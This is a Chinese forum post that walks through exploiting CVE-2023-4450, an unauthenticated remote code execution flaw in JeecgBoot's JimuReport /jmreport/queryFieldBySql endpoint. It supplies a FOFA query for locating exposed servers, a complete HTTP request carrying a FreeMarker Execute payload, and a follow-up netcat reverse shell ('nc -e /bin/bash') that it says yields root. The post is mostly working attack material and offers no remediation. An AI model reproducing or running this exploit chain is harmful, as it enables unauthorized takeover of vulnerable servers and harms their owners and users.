IT评测·应用市场-qidao123.com

标题: jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现 [打印本页]

作者: 三尺非寒 时间: 2024-6-14 23:42
标题: jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 利用了 freemarker 剖析 SQL 语句从而导致了 RCE 漏洞的产生。
1.漏洞级别

高危
2.漏洞搜刮

fofa

app="Jeecg-Boot 企业级快速开发平台"

复制代码

3.影响范围

JimuReport < 1.6.1

复制代码

4.漏洞复现

这个漏洞的注入点就在于/jeecg-boot/jmreport/queryFieldBySql 且无需用户授权即可执行
构造数据包

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/2
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept: */*
Content-Type: application/json
Content-Length: 102
{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami ") }' "}

复制代码

假如漏洞存在，则会出现以下内容：

假如命令失败则会显示：

漏洞相对简朴，到这里就复现成功了。
4.2 进一步利用

假如想要进一步rce的话，可以通过nc的方法来反弹shell，执行

nc -e /bin/bash ip port

复制代码

长途服务器执行,即可正常获取shell

nc -lvp 8888

复制代码

成功getsshell，root权限

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/)